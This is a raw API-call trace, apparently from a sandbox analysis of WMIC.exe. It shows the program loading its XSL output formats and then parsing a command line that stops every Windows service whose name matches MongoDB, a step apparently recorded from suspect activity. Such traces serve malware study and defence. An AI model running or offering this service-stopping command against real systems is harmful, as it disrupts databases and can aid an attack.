(param_1="LIST") returned 0x4 [0304.946] SysStringLen (param_1="MOF") returned 0x3 [0304.946] malloc (_Size=0x18) returned 0x972d40 [0304.946] IUnknown:Release (This=0x866b88) returned 0x0 [0304.946] IUnknown:Release (This=0x869fa8) returned 0x0 [0304.946] IUnknown:Release (This=0x869ff8) returned 0x0 [0304.946] IXMLDOMNodeList:get_item (in: This=0x869ca0, index=8, listItem=0x47fcdc | out: listItem=0x47fcdc*=0x866b88) returned 0x0 [0304.947] IXMLDOMNode:get_text (in: This=0x866b88, text=0x47fce0 | out: text=0x47fce0*="csv.xsl") returned 0x0 [0304.947] IXMLDOMNode:get_attributes (in: This=0x866b88, attributeMap=0x47fcd8 | out: attributeMap=0x47fcd8*=0x869fa8) returned 0x0 [0304.947] malloc (_Size=0xc) returned 0x979898 [0304.947] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x869fa8, name="KEYWORD", namedItem=0x47fcd4 | out: namedItem=0x47fcd4*=0x869ff8) returned 0x0 [0304.947] free (_Block=0x979898) [0304.947] IXMLDOMNode:get_nodeValue (in: This=0x869ff8, value=0x47fc94 | out: value=0x47fc94*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSV", varVal2=0x0)) returned 0x0 [0304.947] malloc (_Size=0xc) returned 0x9798c8 [0304.947] malloc (_Size=0xc) returned 0x979898 [0304.947] SysStringLen (param_1="CSV") returned 0x3 [0304.947] SysStringLen (param_1="TABLE") returned 0x5 [0304.947] SysStringLen (param_1="CSV") returned 0x3 [0304.947] SysStringLen (param_1="LIST") returned 0x4 [0304.947] SysStringLen (param_1="CSV") returned 0x3 [0304.947] SysStringLen (param_1="HTABLE") returned 0x6 [0304.947] SysStringLen (param_1="CSV") returned 0x3 [0304.947] SysStringLen (param_1="HFORM") returned 0x5 [0304.947] malloc (_Size=0x18) returned 0x972a20 [0304.948] IUnknown:Release (This=0x866b88) returned 0x0 [0304.948] IUnknown:Release (This=0x869fa8) returned 0x0 [0304.948] IUnknown:Release (This=0x869ff8) returned 0x0 [0304.948] IXMLDOMNodeList:get_item (in: This=0x869ca0, index=9, listItem=0x47fcdc | out: listItem=0x47fcdc*=0x866b88) returned 0x0 [0304.948] IXMLDOMNode:get_text (in: This=0x866b88, text=0x47fce0 | out: text=0x47fce0*="texttable.xsl") returned 0x0 [0304.948] IXMLDOMNode:get_attributes (in: This=0x866b88, attributeMap=0x47fcd8 | out: attributeMap=0x47fcd8*=0x869fa8) returned 0x0 [0304.948] malloc (_Size=0xc) returned 0x9798b0 [0304.948] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x869fa8, name="KEYWORD", namedItem=0x47fcd4 | out: namedItem=0x47fcd4*=0x869ff8) returned 0x0 [0304.948] free (_Block=0x9798b0) [0304.948] IXMLDOMNode:get_nodeValue (in: This=0x869ff8, value=0x47fc94 | out: value=0x47fc94*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys.xsl", varVal2=0x0)) returned 0x0 [0304.948] malloc (_Size=0xc) returned 0x9798b0 [0304.949] malloc (_Size=0xc) returned 0x97abd0 [0304.949] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0304.949] SysStringLen (param_1="TABLE") returned 0x5 [0304.949] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0304.949] SysStringLen (param_1="VALUE") returned 0x5 [0304.949] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0304.949] SysStringLen (param_1="XML") returned 0x3 [0304.949] SysStringLen (param_1="XML") returned 0x3 [0304.949] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0304.949] malloc (_Size=0x18) returned 0x972b80 [0304.949] IUnknown:Release (This=0x866b88) returned 0x0 [0304.949] IUnknown:Release (This=0x869fa8) returned 0x0 [0304.949] IUnknown:Release (This=0x869ff8) returned 0x0 [0304.949] IXMLDOMNodeList:get_item (in: This=0x869ca0, index=10, listItem=0x47fcdc | out: listItem=0x47fcdc*=0x866b88) returned 0x0 [0304.949] IXMLDOMNode:get_text (in: This=0x866b88, text=0x47fce0 | out: text=0x47fce0*="texttable.xsl") returned 0x0 [0304.949] IXMLDOMNode:get_attributes (in: This=0x866b88, attributeMap=0x47fcd8 | out: attributeMap=0x47fcd8*=0x869fa8) returned 0x0 [0304.949] malloc (_Size=0xc) returned 0x97ac48 [0304.950] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x869fa8, name="KEYWORD", namedItem=0x47fcd4 | out: namedItem=0x47fcd4*=0x869ff8) returned 0x0 [0304.951] free (_Block=0x97ac48) [0304.951] IXMLDOMNode:get_nodeValue (in: This=0x869ff8, value=0x47fc94 | out: value=0x47fc94*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys", varVal2=0x0)) returned 0x0 [0304.951] malloc (_Size=0xc) returned 0x97ab40 [0304.951] malloc (_Size=0xc) returned 0x97ad98 [0304.951] SysStringLen (param_1="texttablewsys") returned 0xd [0304.951] SysStringLen (param_1="TABLE") returned 0x5 [0304.951] SysStringLen (param_1="texttablewsys") returned 0xd [0304.951] SysStringLen (param_1="XML") returned 0x3 [0304.951] SysStringLen (param_1="texttablewsys") returned 0xd [0304.951] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0304.951] SysStringLen (param_1="XML") returned 0x3 [0304.951] SysStringLen (param_1="texttablewsys") returned 0xd [0304.951] malloc (_Size=0x18) returned 0x972c20 [0304.952] IUnknown:Release (This=0x866b88) returned 0x0 [0304.952] IUnknown:Release (This=0x869fa8) returned 0x0 [0304.952] IUnknown:Release (This=0x869ff8) returned 0x0 [0304.952] IXMLDOMNodeList:get_item (in: This=0x869ca0, index=11, listItem=0x47fcdc | out: listItem=0x47fcdc*=0x866b88) returned 0x0 [0304.952] IXMLDOMNode:get_text (in: This=0x866b88, text=0x47fce0 | out: text=0x47fce0*="texttable.xsl") returned 0x0 [0304.952] IXMLDOMNode:get_attributes (in: This=0x866b88, attributeMap=0x47fcd8 | out: attributeMap=0x47fcd8*=0x869fa8) returned 0x0 [0304.952] malloc (_Size=0xc) returned 0x97abe8 [0304.952] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x869fa8, name="KEYWORD", namedItem=0x47fcd4 | out: namedItem=0x47fcd4*=0x869ff8) returned 0x0 [0304.952] free (_Block=0x97abe8) [0304.952] IXMLDOMNode:get_nodeValue (in: This=0x869ff8, value=0x47fc94 | out: value=0x47fc94*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat.xsl", varVal2=0x0)) returned 0x0 [0304.952] malloc (_Size=0xc) returned 0x97ab88 [0304.953] malloc (_Size=0xc) returned 0x97aca8 [0304.953] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0304.953] SysStringLen (param_1="TABLE") returned 0x5 [0304.953] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0304.953] SysStringLen (param_1="XML") returned 0x3 [0304.953] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0304.953] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0304.953] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0304.953] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0304.953] malloc (_Size=0x18) returned 0x972ca0 [0304.953] IUnknown:Release (This=0x866b88) returned 0x0 [0304.953] IUnknown:Release (This=0x869fa8) returned 0x0 [0304.953] IUnknown:Release (This=0x869ff8) returned 0x0 [0304.953] IXMLDOMNodeList:get_item (in: This=0x869ca0, index=12, listItem=0x47fcdc | out: listItem=0x47fcdc*=0x866b88) returned 0x0 [0304.953] IXMLDOMNode:get_text (in: This=0x866b88, text=0x47fce0 | out: text=0x47fce0*="texttable.xsl") returned 0x0 [0304.953] IXMLDOMNode:get_attributes (in: This=0x866b88, attributeMap=0x47fcd8 | out: attributeMap=0x47fcd8*=0x869fa8) returned 0x0 [0304.953] malloc (_Size=0xc) returned 0x97ac18 [0304.954] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x869fa8, name="KEYWORD", namedItem=0x47fcd4 | out: namedItem=0x47fcd4*=0x869ff8) returned 0x0 [0304.954] free (_Block=0x97ac18) [0304.954] IXMLDOMNode:get_nodeValue (in: This=0x869ff8, value=0x47fc94 | out: value=0x47fc94*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat", varVal2=0x0)) returned 0x0 [0304.954] malloc (_Size=0xc) returned 0x97ac00 [0304.954] malloc (_Size=0xc) returned 0x97ab28 [0304.954] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0304.954] SysStringLen (param_1="TABLE") returned 0x5 [0304.954] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0304.954] SysStringLen (param_1="XML") returned 0x3 [0304.954] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0304.954] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0304.954] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0304.954] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0304.954] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0304.954] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0304.954] malloc (_Size=0x18) returned 0x972ae0 [0304.954] IUnknown:Release (This=0x866b88) returned 0x0 [0304.954] IUnknown:Release (This=0x869fa8) returned 0x0 [0304.954] IUnknown:Release (This=0x869ff8) returned 0x0 [0304.955] IXMLDOMNodeList:get_item (in: This=0x869ca0, index=13, listItem=0x47fcdc | out: listItem=0x47fcdc*=0x866b88) returned 0x0 [0304.955] IXMLDOMNode:get_text (in: This=0x866b88, text=0x47fce0 | out: text=0x47fce0*="texttable.xsl") returned 0x0 [0304.955] IXMLDOMNode:get_attributes (in: This=0x866b88, attributeMap=0x47fcd8 | out: attributeMap=0x47fcd8*=0x869fa8) returned 0x0 [0304.955] malloc (_Size=0xc) returned 0x97ac18 [0304.955] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x869fa8, name="KEYWORD", namedItem=0x47fcd4 | out: namedItem=0x47fcd4*=0x869ff8) returned 0x0 [0304.955] free (_Block=0x97ac18) [0304.955] IXMLDOMNode:get_nodeValue (in: This=0x869ff8, value=0x47fc94 | out: value=0x47fc94*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys.xsl", varVal2=0x0)) returned 0x0 [0304.955] malloc (_Size=0xc) returned 0x97adb0 [0304.955] malloc (_Size=0xc) returned 0x97abe8 [0304.955] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0304.955] SysStringLen (param_1="TABLE") returned 0x5 [0304.955] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0304.955] SysStringLen (param_1="XML") returned 0x3 [0304.956] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0304.956] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0304.956] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0304.956] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0304.956] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0304.956] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0304.956] malloc (_Size=0x18) returned 0x9729a0 [0304.956] IUnknown:Release (This=0x866b88) returned 0x0 [0304.956] IUnknown:Release (This=0x869fa8) returned 0x0 [0304.956] IUnknown:Release (This=0x869ff8) returned 0x0 [0304.956] IXMLDOMNodeList:get_item (in: This=0x869ca0, index=14, listItem=0x47fcdc | out: listItem=0x47fcdc*=0x866b88) returned 0x0 [0304.956] IXMLDOMNode:get_text (in: This=0x866b88, text=0x47fce0 | out: text=0x47fce0*="texttable.xsl") returned 0x0 [0304.956] IXMLDOMNode:get_attributes (in: This=0x866b88, attributeMap=0x47fcd8 | out: attributeMap=0x47fcd8*=0x869fa8) returned 0x0 [0304.956] malloc (_Size=0xc) returned 0x97ac60 [0304.956] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x869fa8, name="KEYWORD", namedItem=0x47fcd4 | out: namedItem=0x47fcd4*=0x869ff8) returned 0x0 [0304.957] free (_Block=0x97ac60) [0304.957] IXMLDOMNode:get_nodeValue (in: This=0x869ff8, value=0x47fc94 | out: value=0x47fc94*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys", varVal2=0x0)) returned 0x0 [0304.957] malloc (_Size=0xc) returned 0x97adc8 [0304.957] malloc (_Size=0xc) returned 0x97ad80 [0304.957] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0304.957] SysStringLen (param_1="TABLE") returned 0x5 [0304.957] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0304.957] SysStringLen (param_1="XML") returned 0x3 [0304.957] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0304.957] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0304.957] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0304.957] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0304.957] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0304.957] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0304.957] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0304.957] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0304.957] malloc (_Size=0x18) returned 0x972c40 [0304.957] IUnknown:Release (This=0x866b88) returned 0x0 [0304.957] IUnknown:Release (This=0x869fa8) returned 0x0 [0304.957] IUnknown:Release (This=0x869ff8) returned 0x0 [0304.957] IXMLDOMNodeList:get_item (in: This=0x869ca0, index=15, listItem=0x47fcdc | out: listItem=0x47fcdc*=0x866b88) returned 0x0 [0304.958] IXMLDOMNode:get_text (in: This=0x866b88, text=0x47fce0 | out: text=0x47fce0*="htable.xsl") returned 0x0 [0304.958] IXMLDOMNode:get_attributes (in: This=0x866b88, attributeMap=0x47fcd8 | out: attributeMap=0x47fcd8*=0x869fa8) returned 0x0 [0304.958] malloc (_Size=0xc) returned 0x97ac18 [0304.958] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x869fa8, name="KEYWORD", namedItem=0x47fcd4 | out: namedItem=0x47fcd4*=0x869ff8) returned 0x0 [0304.958] free (_Block=0x97ac18) [0304.958] IXMLDOMNode:get_nodeValue (in: This=0x869ff8, value=0x47fc94 | out: value=0x47fc94*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby.xsl", varVal2=0x0)) returned 0x0 [0304.958] malloc (_Size=0xc) returned 0x97abb8 [0304.958] malloc (_Size=0xc) returned 0x97ab58 [0304.958] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0304.958] SysStringLen (param_1="TABLE") returned 0x5 [0304.958] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0304.958] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0304.958] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0304.958] SysStringLen (param_1="XML") returned 0x3 [0304.958] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0304.958] SysStringLen (param_1="texttablewsys") returned 0xd [0304.959] SysStringLen (param_1="XML") returned 0x3 [0304.959] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0304.959] malloc (_Size=0x18) returned 0x972b00 [0304.959] IUnknown:Release (This=0x866b88) returned 0x0 [0304.959] IUnknown:Release (This=0x869fa8) returned 0x0 [0304.959] IUnknown:Release (This=0x869ff8) returned 0x0 [0304.959] IXMLDOMNodeList:get_item (in: This=0x869ca0, index=16, listItem=0x47fcdc | out: listItem=0x47fcdc*=0x866b88) returned 0x0 [0304.959] IXMLDOMNode:get_text (in: This=0x866b88, text=0x47fce0 | out: text=0x47fce0*="htable.xsl") returned 0x0 [0304.959] IXMLDOMNode:get_attributes (in: This=0x866b88, attributeMap=0x47fcd8 | out: attributeMap=0x47fcd8*=0x869fa8) returned 0x0 [0304.959] malloc (_Size=0xc) returned 0x97ac18 [0304.959] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x869fa8, name="KEYWORD", namedItem=0x47fcd4 | out: namedItem=0x47fcd4*=0x869ff8) returned 0x0 [0304.959] free (_Block=0x97ac18) [0304.959] IXMLDOMNode:get_nodeValue (in: This=0x869ff8, value=0x47fc94 | out: value=0x47fc94*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby", varVal2=0x0)) returned 0x0 [0304.959] malloc (_Size=0xc) returned 0x97ac18 [0304.960] malloc (_Size=0xc) returned 0x97ab10 [0304.960] SysStringLen (param_1="htable-sortby") returned 0xd [0304.960] SysStringLen (param_1="TABLE") returned 0x5 [0304.960] SysStringLen (param_1="htable-sortby") returned 0xd [0304.960] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0304.960] SysStringLen (param_1="htable-sortby") returned 0xd [0304.960] SysStringLen (param_1="XML") returned 0x3 [0304.960] SysStringLen (param_1="htable-sortby") returned 0xd [0304.960] SysStringLen (param_1="texttablewsys") returned 0xd [0304.960] SysStringLen (param_1="htable-sortby") returned 0xd [0304.960] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0304.960] SysStringLen (param_1="XML") returned 0x3 [0304.960] SysStringLen (param_1="htable-sortby") returned 0xd [0304.960] malloc (_Size=0x18) returned 0x972b20 [0304.960] IUnknown:Release (This=0x866b88) returned 0x0 [0304.960] IUnknown:Release (This=0x869fa8) returned 0x0 [0304.960] IUnknown:Release (This=0x869ff8) returned 0x0 [0304.960] IXMLDOMNodeList:get_item (in: This=0x869ca0, index=17, listItem=0x47fcdc | out: listItem=0x47fcdc*=0x866b88) returned 0x0 [0304.960] IXMLDOMNode:get_text (in: This=0x866b88, text=0x47fce0 | out: text=0x47fce0*="mof.xsl") returned 0x0 [0304.960] IXMLDOMNode:get_attributes (in: This=0x866b88, attributeMap=0x47fcd8 | out: attributeMap=0x47fcd8*=0x869fa8) returned 0x0 [0304.960] malloc (_Size=0xc) returned 0x97acf0 [0304.960] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x869fa8, name="KEYWORD", namedItem=0x47fcd4 | out: namedItem=0x47fcd4*=0x869ff8) returned 0x0 [0304.961] free (_Block=0x97acf0) [0304.961] IXMLDOMNode:get_nodeValue (in: This=0x869ff8, value=0x47fc94 | out: value=0x47fc94*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat.xsl", varVal2=0x0)) returned 0x0 [0304.961] malloc (_Size=0xc) returned 0x97ade0 [0304.961] malloc (_Size=0xc) returned 0x97ac90 [0304.961] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0304.961] SysStringLen (param_1="TABLE") returned 0x5 [0304.961] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0304.961] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0304.961] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0304.961] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0304.961] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0304.961] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0304.961] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0304.961] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0304.961] malloc (_Size=0x18) returned 0x972d20 [0304.961] IUnknown:Release (This=0x866b88) returned 0x0 [0304.961] IUnknown:Release (This=0x869fa8) returned 0x0 [0304.961] IUnknown:Release (This=0x869ff8) returned 0x0 [0304.961] IXMLDOMNodeList:get_item (in: This=0x869ca0, index=18, listItem=0x47fcdc | out: listItem=0x47fcdc*=0x866b88) returned 0x0 [0304.962] IXMLDOMNode:get_text (in: This=0x866b88, text=0x47fce0 | out: text=0x47fce0*="mof.xsl") returned 0x0 [0304.962] IXMLDOMNode:get_attributes (in: This=0x866b88, attributeMap=0x47fcd8 | out: attributeMap=0x47fcd8*=0x869fa8) returned 0x0 [0304.962] malloc (_Size=0xc) returned 0x97acc0 [0304.962] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x869fa8, name="KEYWORD", namedItem=0x47fcd4 | out: namedItem=0x47fcd4*=0x869ff8) returned 0x0 [0304.962] free (_Block=0x97acc0) [0304.962] IXMLDOMNode:get_nodeValue (in: This=0x869ff8, value=0x47fc94 | out: value=0x47fc94*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat", varVal2=0x0)) returned 0x0 [0304.962] malloc (_Size=0xc) returned 0x97adf8 [0304.962] malloc (_Size=0xc) returned 0x97ad50 [0304.962] SysStringLen (param_1="wmiclimofformat") returned 0xf [0304.962] SysStringLen (param_1="TABLE") returned 0x5 [0304.962] SysStringLen (param_1="wmiclimofformat") returned 0xf [0304.962] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0304.962] SysStringLen (param_1="wmiclimofformat") returned 0xf [0304.962] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0304.963] SysStringLen (param_1="wmiclimofformat") returned 0xf [0304.963] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0304.963] SysStringLen (param_1="wmiclimofformat") returned 0xf [0304.963] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0304.963] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0304.963] SysStringLen (param_1="wmiclimofformat") returned 0xf [0304.963] malloc (_Size=0x18) returned 0x972d60 [0304.963] IUnknown:Release (This=0x866b88) returned 0x0 [0304.963] IUnknown:Release (This=0x869fa8) returned 0x0 [0304.963] IUnknown:Release (This=0x869ff8) returned 0x0 [0304.963] IXMLDOMNodeList:get_item (in: This=0x869ca0, index=19, listItem=0x47fcdc | out: listItem=0x47fcdc*=0x866b88) returned 0x0 [0304.963] IXMLDOMNode:get_text (in: This=0x866b88, text=0x47fce0 | out: text=0x47fce0*="textvaluelist.xsl") returned 0x0 [0304.963] IXMLDOMNode:get_attributes (in: This=0x866b88, attributeMap=0x47fcd8 | out: attributeMap=0x47fcd8*=0x869fa8) returned 0x0 [0304.963] malloc (_Size=0xc) returned 0x97ad68 [0304.963] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x869fa8, name="KEYWORD", namedItem=0x47fcd4 | out: namedItem=0x47fcd4*=0x869ff8) returned 0x0 [0304.964] free (_Block=0x97ad68) [0304.964] IXMLDOMNode:get_nodeValue (in: This=0x869ff8, value=0x47fc94 | out: value=0x47fc94*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat.xsl", varVal2=0x0)) returned 0x0 [0304.964] malloc (_Size=0xc) returned 0x97ad20 [0304.964] malloc (_Size=0xc) returned 0x97ac30 [0304.964] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0304.964] SysStringLen (param_1="TABLE") returned 0x5 [0304.964] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0304.964] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0304.964] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0304.964] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0304.964] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0304.964] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0304.964] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0304.964] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0304.964] malloc (_Size=0x18) returned 0x972a40 [0304.964] IUnknown:Release (This=0x866b88) returned 0x0 [0304.964] IUnknown:Release (This=0x869fa8) returned 0x0 [0304.964] IUnknown:Release (This=0x869ff8) returned 0x0 [0304.964] IXMLDOMNodeList:get_item (in: This=0x869ca0, index=20, listItem=0x47fcdc | out: listItem=0x47fcdc*=0x866b88) returned 0x0 [0304.965] IXMLDOMNode:get_text (in: This=0x866b88, text=0x47fce0 | out: text=0x47fce0*="textvaluelist.xsl") returned 0x0 [0304.965] IXMLDOMNode:get_attributes (in: This=0x866b88, attributeMap=0x47fcd8 | out: attributeMap=0x47fcd8*=0x869fa8) returned 0x0 [0304.965] malloc (_Size=0xc) returned 0x97ad38 [0304.965] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x869fa8, name="KEYWORD", namedItem=0x47fcd4 | out: namedItem=0x47fcd4*=0x869ff8) returned 0x0 [0304.965] free (_Block=0x97ad38) [0304.965] IXMLDOMNode:get_nodeValue (in: This=0x869ff8, value=0x47fc94 | out: value=0x47fc94*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat", varVal2=0x0)) returned 0x0 [0304.965] malloc (_Size=0xc) returned 0x97ad68 [0304.965] malloc (_Size=0xc) returned 0x97aba0 [0304.968] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0304.968] SysStringLen (param_1="TABLE") returned 0x5 [0304.968] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0304.968] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0304.968] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0304.968] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0304.968] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0304.968] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0304.968] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0304.968] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0304.968] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0304.969] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0304.969] malloc (_Size=0x18) returned 0x972c60 [0304.969] IUnknown:Release (This=0x866b88) returned 0x0 [0304.969] IUnknown:Release (This=0x869fa8) returned 0x0 [0304.969] IUnknown:Release (This=0x869ff8) returned 0x0 [0304.969] IUnknown:Release (This=0x869ca0) returned 0x0 [0304.969] FreeThreadedDOMDocument:IUnknown:Release (This=0x866b48) returned 0x1 [0304.969] FreeThreadedDOMDocument:IUnknown:Release (This=0x8645a8) returned 0x0 [0304.969] free (_Block=0x9799b8) [0304.969] GetCommandLineW () returned="\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%MongoDB%%'\" call stopservice" [0304.969] malloc (_Size=0xd0) returned 0x97aee8 [0304.969] memcpy_s (in: _Destination=0x97aee8, _DestinationSize=0xce, _Source=0x6b1b78, _SourceSize=0xce | out: _Destination=0x97aee8) returned 0x0 [0304.969] malloc (_Size=0xc) returned 0x97ab70 [0304.969] malloc (_Size=0xc) returned 0x97ac48 [0304.970] malloc (_Size=0xc) returned 0x97acf0 [0304.970] malloc (_Size=0xc) returned 0x97acd8 [0304.970] malloc (_Size=0x80) returned 0x97afc0 [0304.970] GetLocalTime (in: lpSystemTime=0x47fc78 | out: lpSystemTime=0x47fc78*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x2, wHour=0x8, wMinute=0x1d, wSecond=0xb, wMilliseconds=0x16)) [0304.970] _vsnwprintf (in: _Buffer=0x97afc0, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x47fc58 | out: _Buffer="04-02-2020T08:29:11") returned 19 [0304.970] lstrlenW (lpString=" path Win32_Service where \"name like '%%MongoDB%%'\" call stopservice") returned 68 [0304.970] malloc (_Size=0x8a) returned 0x97b048 [0304.970] lstrlenW (lpString=" path Win32_Service where \"name like '%%MongoDB%%'\" call stopservice") returned 68 [0304.970] lstrlenW (lpString=" path Win32_Service where \"name like '%%MongoDB%%'\" call stopservice") returned 68 [0304.970] malloc (_Size=0x8a) returned 0x97b0e0 [0304.970] lstrlenW (lpString=" path Win32_Service where \"name like '%%MongoDB%%'\" call stopservice") returned 68 [0304.970] lstrlenW (lpString=" path Win32_Service where \"name like '%%MongoDB%%'\" call stopservice") returned 68 [0304.970] lstrlenW (lpString=" path Win32_Service where \"name like '%%MongoDB%%'\" call stopservice") returned 68 [0304.970] malloc (_Size=0xa) returned 0x97ad08 [0304.970] lstrlenW (lpString="path") returned 4 [0304.970] _wcsicmp (_String1="path", _String2="\"NULL\"") returned 78 [0304.970] malloc (_Size=0xa) returned 0x97ac60 [0304.970] malloc (_Size=0x4) returned 0x972ee8 [0304.971] free (_Block=0x0) [0304.971] free (_Block=0x97ad08) [0304.971] lstrlenW (lpString=" path Win32_Service where \"name like '%%MongoDB%%'\" call stopservice") returned 68 [0304.971] malloc (_Size=0x1c) returned 0x979da8 [0304.971] lstrlenW (lpString="Win32_Service") returned 13 [0304.971] _wcsicmp (_String1="Win32_Service", _String2="\"NULL\"") returned 85 [0304.971] malloc (_Size=0x1c) returned 0x970568 [0304.971] malloc (_Size=0x8) returned 0x970590 [0304.971] memmove_s (in: _Destination=0x970590, _DestinationSize=0x4, _Source=0x972ee8, _SourceSize=0x4 | out: _Destination=0x970590) returned 0x0 [0304.971] free (_Block=0x972ee8) [0304.971] free (_Block=0x0) [0304.971] free (_Block=0x979da8) [0304.971] lstrlenW (lpString=" path Win32_Service where \"name like '%%MongoDB%%'\" call stopservice") returned 68 [0304.971] malloc (_Size=0xc) returned 0x97ac78 [0304.971] lstrlenW (lpString="where") returned 5 [0304.971] _wcsicmp (_String1="where", _String2="\"NULL\"") returned 85 [0304.971] malloc (_Size=0xc) returned 0x97acc0 [0304.971] malloc (_Size=0xc) returned 0x97ad08 [0304.971] memmove_s (in: _Destination=0x97ad08, _DestinationSize=0x8, _Source=0x970590, _SourceSize=0x8 